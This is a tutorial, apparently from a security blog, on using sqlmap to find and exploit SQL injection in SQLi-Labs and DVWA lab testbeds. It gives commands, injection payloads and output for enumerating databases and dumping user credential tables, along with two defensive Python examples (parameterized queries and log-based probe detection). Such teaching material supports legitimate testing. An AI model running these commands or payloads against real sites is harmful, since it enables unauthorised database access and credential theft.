Sqlmap Tutorial for Beginners : How to use sqlmap | Exploiting SQL Injection vulnerability with sqlmap

Sqlmap is a powerful SQL injection automation tool, used to exploit SQL injection vulnerabilities in websites and web applications. It is written in Python. With sqlmap we can exploit remote databases and extract information from them: database names, table names, column names, all the data in the tables, etc. can be extracted from the database. Under certain conditions it can also read and write files on the remote file system.

Installation of sqlmap :

sqlmap comes installed by default with various pentesting distributions like Kali Linux, BackBox etc. We can also install sqlmap on Linux or Windows operating systems. Since sqlmap is written in Python, we need to install a Python interpreter on our operating system first.

Installation in Linux :

On Linux based operating systems Python is installed by default. Now you can download sqlmap from http://sqlmap.org. The download link is given on the right side of the website.


Extract the files from the compressed zip archive and then run the sqlmap.py file.

We can also install sqlmap directly from the official git repository with the following git command:
 git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
Now go to the sqlmap-dev folder with
 cd sqlmap-dev
and run the sqlmap.py file with the '-h' flag :
 ./sqlmap.py -h
The above command shows the sqlmap help menu.


Installation in Windows :

On the Windows operating system we first need to install a Python interpreter, which can be downloaded from python.org. The link for the Windows installer is : https://www.python.org/downloads/windows/

There are two series of Python interpreter available: Python 2.7.x and Python 3.6.x. Sqlmap should run fine on both. I am using Python 2.7.x on Windows. So download the appropriate installer file and install it. For a more detailed installation guide for Python on Windows please refer to the post below.

                Installing Python Interpreter in Windows 10

Now go to sqlmap.org, download the sqlmap zip archive file from there and extract all the files.


Now open a command prompt and change to the sqlmap files directory. From there you can run sqlmap with the command below (I assume you added the Python interpreter to your PATH environment variable) :
 sqlmap.py -h


Sqlmap basic Options :

Some of the basic options in sqlmap are as follows :

-h, --help           Show basic help message and exit
-hh                  Show advanced help message and exit
-u URL, --url=URL    Target URL
--cookie             Set the authentication cookie used for maintaining access
--dbs                Enumerate databases
--technique          Specify which SQL injection technique is to be used
--dbms               Specify DBMS name if you already know it (your time is precious, save it)
-p TESTPARAMETER     Specify if you already know testable parameter(s)


Sqlmap Usage :

For demonstration purposes we are going to use Audi-1's SQLi-Labs test bed and DVWA.

1. Simple DBMS scan with the '-u' flag :
 sqlmap -u "target_url"
 sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1"
The above command checks whether the URL is vulnerable, tests the input parameters and also reports information like the web server OS, back-end technology/components, SQL server details etc. The output of the above command is :
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: id (GET)
 Type: boolean-based blind
 Title: AND boolean-based blind - WHERE or HAVING clause
 Payload: id=1' AND 2990=2990 AND 'OsPq'='OsPq

 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: id=1' AND SLEEP(5) AND 'AWKs'='AWKs

 Type: UNION query
 Title: Generic UNION query (NULL) - 3 columns
 Payload: id=-6989' UNION ALL SELECT NULL,CONCAT(0x71626b6a71,0x55455363655748446d6b5278574b47486a724a7a446675496547596f564773584e66447149697369,0x71717a6b71),NULL-- wphi
---
[13:28:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12

As we can see, the id parameter is vulnerable to SQL injection, so we can perform further operations.
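Why the id parameter falls to the boolean-based payload shown above, as an added example that is not part of the original post or of the SQLi-Labs code: a lookup that concatenates the request parameter into the SQL string (the shape of the Less-1 page) beside the same lookup with a bound parameter, run against an in-memory SQLite table with constructed rows in the layout of security.users.

```python
import sqlite3

# Constructed sample rows in the layout of the security.users table dumped later on the page.
ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")]


def make_db():
    """Build an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, id_param):
    """Mimics Less-1: the raw request parameter is spliced into the SQL text."""
    sql = "SELECT username FROM users WHERE id = '" + id_param + "' LIMIT 1"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, id_param):
    """Same query with a bound parameter: the input is treated as data, never as SQL syntax."""
    sql = "SELECT username FROM users WHERE id = ? LIMIT 1"
    return [row[0] for row in conn.execute(sql, (id_param,))]


def demo():
    """Run both lookups with a normal value and with the boolean-blind probe pair."""
    conn = make_db()
    normal = "1"
    true_probe = "1' AND 2990=2990 AND 'OsPq'='OsPq"    # payload reported by sqlmap above
    false_probe = "1' AND 2990=2991 AND 'OsPq'='OsPq"   # constructed false twin of that payload
    return {
        # vulnerable: the row comes back only when the injected condition is true,
        # which is exactly the signal a boolean-based blind probe measures
        "vuln_normal": lookup_vulnerable(conn, normal),
        "vuln_true": lookup_vulnerable(conn, true_probe),
        "vuln_false": lookup_vulnerable(conn, false_probe),
        # parameterized: the whole string is compared against id, so neither probe matches
        "safe_true": lookup_safe(conn, true_probe),
        "safe_false": lookup_safe(conn, false_probe),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

With the concatenated query the true probe returns the same row as id=1 while the false probe returns nothing, which is the difference sqlmap's boolean-based test keys on; with the bound parameter both probes return nothing.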

2. List all the databases present on the server with the '--dbs' flag :
 sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dbs
The above command exploits the SQLi vulnerability and tries to retrieve all the database names available on the target server. Output of the above command :
[13:35:02] [INFO] retrieved: 10
[13:35:02] [INFO] retrieved: information_schema
[13:35:05] [INFO] retrieved: bWAPP
[13:35:06] [INFO] retrieved: challenges
[13:35:08] [INFO] retrieved: dvwa
[13:35:09] [INFO] retrieved: metasploit
[13:35:11] [INFO] retrieved: mysql
[13:35:12] [INFO] retrieved: owasp10
[13:35:13] [INFO] retrieved: security
[13:35:15] [INFO] retrieved: tikiwiki
[13:35:17] [INFO] retrieved: tikiwiki195
available databases [10]:
[*] bWAPP
[*] challenges
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] security
[*] tikiwiki
[*] tikiwiki195

3. List all the tables from a particular database with '--tables' :
 sqlmap -u "target_url" --tables -D <database_name>
Example :
 sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --tables -D security
The above command extracts the table names from the database named security. Output of the above command :
[13:39:05] [INFO] retrieved: 4
[13:39:05] [INFO] retrieved: emails
[13:39:06] [INFO] retrieved: referers
[13:39:08] [INFO] retrieved: uagents
[13:39:09] [INFO] retrieved: users
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

4. Getting the columns of a particular table with '--columns' :
 sqlmap -u "target_url" --columns -D <database_name> -T <table_name>
Example :
 sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --columns -D security -T users
Output of the above command :
[13:41:52] [INFO] starting 5 threads
[13:41:52] [INFO] retrieved: username
[13:41:52] [INFO] retrieved: id
[13:41:57] [INFO] retrieved: password
[13:43:04] [INFO] retrieved: password

Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | numeric     |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

5. Dumping all the data from a table with '--dump' :
 sqlmap -u "target_url" --dump -D <database_name> -T <table_name>
Example :
 sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D security -T users
Output of the above command :
Database: security
Table: users
[13 entries]
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 1  | Dumb     | Dumb       |
| 2  | Angelina | I-kill-you |
| 3  | Dummy    | p@ssword   |
| 4  | secure   | crappy     |
| 5  | stupid   | stupidity  |
| 6  | superman | genious    |
| 7  | batman   | mob!le     |
| 8  | admin    | admin      |
| 9  | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+

6. To dump data from specific columns using the '-C' flag :

The syntax would be :
 sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D <database_name> -T <table_name> -C "column_names"
Example :
 sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D security -T users -C "username, password"

7. Using sqlmap with cookie data :

Sometimes, to access a specific part of a website, we need to provide cookies within the request. In this situation we can use the '--cookie' flag in sqlmap. The syntax will be :
 sqlmap -u "target_url" --cookie="cookie-data"
Example :
 sqlmap -u "192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=3696c6f8aba1bcae08e988cca359b176"
Output :
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
---
Parameter: id (GET)
  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind
  Payload: id=1' AND SLEEP(5) AND 'SyrI'='SyrI&Submit=Submit

  Type: UNION query
  Title: Generic UNION query (NULL) - 2 columns
  Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176707871,0x714755524551444f6250764c446b506e434b5266564f426c4976674d5076646a416177744b4f6142,0x7176767871)-- hGEE&Submit=Submit
---
[14:00:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12

8. Using sqlmap with login forms / POST forms :

To test login forms or other POST forms for SQL injection vulnerabilities, the '--data' flag is used. The syntax is :
 sqlmap -u "target_url" --data="post_data"
Example :
 sqlmap -u "http://192.168.56.101/sqli/Less-12/" --data="uname=dumb&passwd=12345&submit=Submit"

9. Using different injection techniques in sqlmap :

To select which SQL injection techniques are used during the injection process, the '--technique' flag is used with the letters below :

E  Error-based injection
U  UNION query based injection
B  Boolean-based blind (or simply blind) injection
T  Time-based blind injection
S  Stacked queries
Q  Inline queries

For example :
 sqlmap --technique=U -u "http://192.168.56.103/sqli/Less-1/?id=1"
or
 sqlmap --technique=B -u "http://192.168.56.103/sqli/Less-1/?id=1"
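The same technique letters are useful on the defending side: the scan output earlier on the page shows what a boolean-based (B), time-based (T) and UNION (U) probe look like in the request URL. As an added example that is not part of the original post or of sqlmap, the detector below URL-decodes the request path from constructed Apache-style access log lines and tags each probe with the matching technique letter.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines, modelled on the three payload shapes sqlmap reported above.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2018:13:28:50 +0000] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2018:13:28:51 +0000] "GET /sqli/Less-1/?id=1%27%20AND%202990%3D2990%20AND%20%27OsPq%27%3D%27OsPq HTTP/1.1" 200 721 "-" "sqlmap/1.2"
10.0.0.5 - - [12/Mar/2018:13:28:53 +0000] "GET /sqli/Less-1/?id=1%27%20AND%20SLEEP%285%29%20AND%20%27AWKs%27%3D%27AWKs HTTP/1.1" 200 721 "-" "sqlmap/1.2"
10.0.0.5 - - [12/Mar/2018:13:28:54 +0000] "GET /sqli/Less-1/?id=-6989%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x71626b6a71%2C0x55%2C0x71717a6b71%29%2CNULL--%20wphi HTTP/1.1" 200 933 "-" "sqlmap/1.2"
10.0.0.9 - - [12/Mar/2018:13:29:00 +0000] "GET /sqli/Less-1/?id=42 HTTP/1.1" 200 721 "-" "Mozilla/5.0"
"""

# Fields of one combined-format line: client IP, timestamp, method, request path, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')

# Signatures keyed by sqlmap's --technique letters; each is matched against the decoded query string.
SIGNATURES = [
    ("T", re.compile(r"\b(SLEEP|BENCHMARK|WAITFOR\s+DELAY|pg_sleep)\s*\(", re.I)),  # time-based blind
    ("U", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),                      # UNION query
    ("B", re.compile(r"'\s*(AND|OR)\s+\S+\s*=\s*\S+", re.I)),                     # boolean-based blind
]


def classify(query):
    """Return the technique letters whose signature appears in the URL-decoded query string."""
    decoded = unquote_plus(query)
    return [letter for letter, rx in SIGNATURES if rx.search(decoded)]


def scan_log(text):
    """Return (client_ip, technique_letters, decoded_path) for every line that looks like an injection probe."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        letters = classify(m.group("path"))
        if letters:
            hits.append((m.group("ip"), letters, unquote_plus(m.group("path"))))
    return hits


if __name__ == "__main__":
    for ip, letters, path in scan_log(SAMPLE_LOG):
        print(ip, "".join(letters), path)
```

Decoding before matching matters: the raw log line contains %27 and %20 rather than a quote and a space, so the signatures would miss every probe without it.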

10. Custom URL marker

The custom URL marker is used to specify the payload injection point in the given URL. For this, the * (asterisk) sign is placed in the URL at the position where the payload should be injected. For example :
 sqlmap -u "http://192.168.56.103/sqli/Less-1/?id=*"
or
 sqlmap -u "http://sec-art.net/?name=*&query=web"

11. Using sqlmap in multi-threaded mode :

To speed up the process, we can also run the injection process with multiple threads. The multi-threaded mode is enabled with the '--threads' flag. The syntax is :
 sqlmap -u "target_url" --threads <number_of_threads>
Example :
 sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D security --threads 3
where the number 3 denotes the number of threads.

12. HTTP persistent connection :

The '--keep-alive' flag keeps the HTTP connection to the server open instead of closing and reopening it for every request, which reduces the connection overhead on the server.

Example :
 sqlmap -u  "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D security --keep-alive

13. HTTP NULL connection :

With the '--null-connection' flag sqlmap tries to exploit the application without retrieving the full response body for every request, which saves bandwidth.
 sqlmap -u  "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D security --null-connection

14. The '--predict-output' flag :

The predict-output flag is used to predict common query output, like table names and column names, from statistics of frequently seen values, especially in boolean/time-based blind injection, to speed up the process.
 sqlmap -u "http://192.168.56.101/sqli/Less-8/?id=1" --dump -D security -T users --predict-output

15. Using sqlmap with a proxy :

With the '--proxy' flag we can run sqlmap through a proxy server. Syntax :
 sqlmap.py --proxy="http://proxyserver:port" -u "target_url"
Example :
 sqlmap.py --proxy="http://myproxyserver.proxy.com:8080" -u "http://192.168.56.101/sqli/Less-1/?id=1"

Some of the available options related to the database and its users are as follows :
  • Current session user :
 sqlmap -u "http://192.168.56.103/sqli/Less-1/?id=1" --current-user
  • Find out if the session user is a database administrator :
 sqlmap -u "http://192.168.56.103/sqli/Less-1/?id=1" --is-dba
  • List the database system users :
 sqlmap -u "http://192.168.56.103/sqli/Less-1/?id=1" --users
  • Check the privileges of the database users :
 sqlmap -u "http://192.168.56.103/sqli/Less-1/?id=1" --privileges

There is also a lot of other cool stuff we can do with sqlmap, like the SQL shell, a shell on the remote OS, reading and writing files etc. We will look at them in the next post.